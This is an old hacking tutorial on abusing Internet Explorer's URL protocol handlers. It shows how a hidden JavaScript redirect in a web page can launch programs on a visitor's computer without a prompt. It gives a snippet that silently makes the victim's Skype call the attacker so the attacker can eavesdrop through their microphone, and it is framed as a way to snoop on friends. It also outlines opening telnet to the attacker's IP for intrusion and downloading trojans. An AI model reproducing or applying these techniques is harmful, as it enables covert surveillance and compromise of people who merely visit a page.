IE Xploit

What the IE exploit is, how to use it, how to hide it and what you can do. Examples. Script kiddies beware, this article is engineered only to give enough to be just that script kiddies, the hardcore stuff you\'ve got to learn yourself.

-=IE Exploit=-

Ok, this exploit isn't exactly the newest in the book, but it's still valid and hasn't been

patched(thanks Microsoft.) So basically this exploit allows us to remotely run programs on

computers via a web page. So let's dig in.

We'll start with a bit of stuff you should know:

Open up IE and in the URL bar type "C:\"
Wow, IE just turned into a windows explorer(sorta.)
Isn't that intresting? Well, what if we could run other programs that way...what could we do?
Think about anysite you've been to that allows you to open an aim window to someone. Ever

looked at the hyperlink text?
It looks something like this:
aim:goIm?screenname=tikprog&message=hello+world
okay, lets break that up a bit.
we've got 3 parts to this
aim:
goIm?
screenname=tikprog&message=hello+world

ok, the aim part tells the browser what program to use, various programs have this,
aim:
yahoo:
irc:
ect....

next we have goIM? look like php to anyone but me? yeah....similar. it's the command. aim

has alot of these:
goIm?
goAway?
and lots of others (google "aim:goIM?" and it should give you a nice list)

and finally, those of you who know php will know this already, the last bit are the

parameters...that will send it to me with "hello world" in it. I'm not going to explain aim

scripting(if you can even call it that, google is your friend, or if you beg maybe I'll write a

"scripting for various things" article).

Okay, to the important part here the "aim:" part. Now, if Aim has this, and as I've said so

does yahoo and IRC, what else may have it? Well, I know for a fact alot of things do...I'll

give some examples later, but first I want you to learn a bit...because that is what being a

hacker is about.

The reason this is good for IE and not other browsers(yay for FireFox!) is that IE doesn't

prompt you for confirmation that you want to run this script, FireFox prompts you with a nice

little box. Now, this become a dangerous exploit when you realize that some other

programs that are more dangerous than AIM or IRC have this property. Let's

say....oh....command, telnet, regedit. Now, for command and regedit I'm only going to show

howto access them, using them is much more difficult and I'm not giving that up so a bunch

of script kiddies can flood the next with destructive webpages. Those of you how actually

figure it out I'm hoping are not going to kill the world. These pages can do ALOT of damage

and I in no way advocate them for destructive, but there is a way(that I will show) to use

them to gain some nice access and play some fun tricks.

With that being said....let's move on to the next topic. So now you have half a clue what's

up with this exploit. If you've been paying attention you may be thinking to yourself "<insert

prefered name here> don't they have to click a hyperlink? Who's dumb enough to do that?"

Thankfully, the Samurai has put 2 and 2 together(and gotten 5....read 1984, seriously) and

made a nice little script to do that too. So, I'm not explaining how Jscripts work, just going

to show you the code and give a brief explaination...if you don't know Jscripts....GO LEARN

DAMNIT. so here's my code

<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>

So, what does this do? I redirects the page to that URL, which isn't a URL, just a nice little

command. Embed this in a webpage and noone will notice...no change is made...it just runs

nicely.

So....now your thinking "...but Samurai, who care about putting an AIM message script in."

and again ye of little faith, I am some fun with this. I'll give you a few nice ones.

For snooping:
There is a nice little messaging program out there, skype (www.skype.com I would

recommend it. It's encrypted, allows VoIP, has rocking emoticons type "(finger)" for a

hidden one, and just kicks AIMs butt), most important is VoIP. So, let's say you get your

friend ( or whoever you want to snoop on.) Next go nab the source from a trusted site. I like

google. And build a webpage on it (make sure you change the picture source so they show

up) and place it in something like geocities with embedded code and use aim to hide the

link by putting fake text (html works nicely too) with the URL.

Skype's command works like this:
skype:
and you put the parmater where the command went and the command where the parameter

was.... username?call.
so embed this code:

<script>
window.location="skype:username?call";
</script>

And then answer the call. If they have a mic it will turn on and you can listen in.

Now, as promised the reason for this...intrusion!

Build a similar page and we're using our friend telnet. Your going to need my simple trojan

article, or build a socket reciever in VB or whatever you want. Now this only works if you

can get a REAL IP address for yourself. If your behind a router(or they are) it may not work.

So we all know our friend telnet. So your code needs to open telnet to your IP address on

the port you want. Telnet has a slightly different protocal to use here (think like command

line) and use that in the Jscript code. I'm not giving you the whole thing...I want YOU to

learn and to make sure not everyone does this.

So just think...using command, regedit, *nix you could open ports, run other apps,

download trojans. And with a bit of creativity possibly gain some new access.

Enjoy.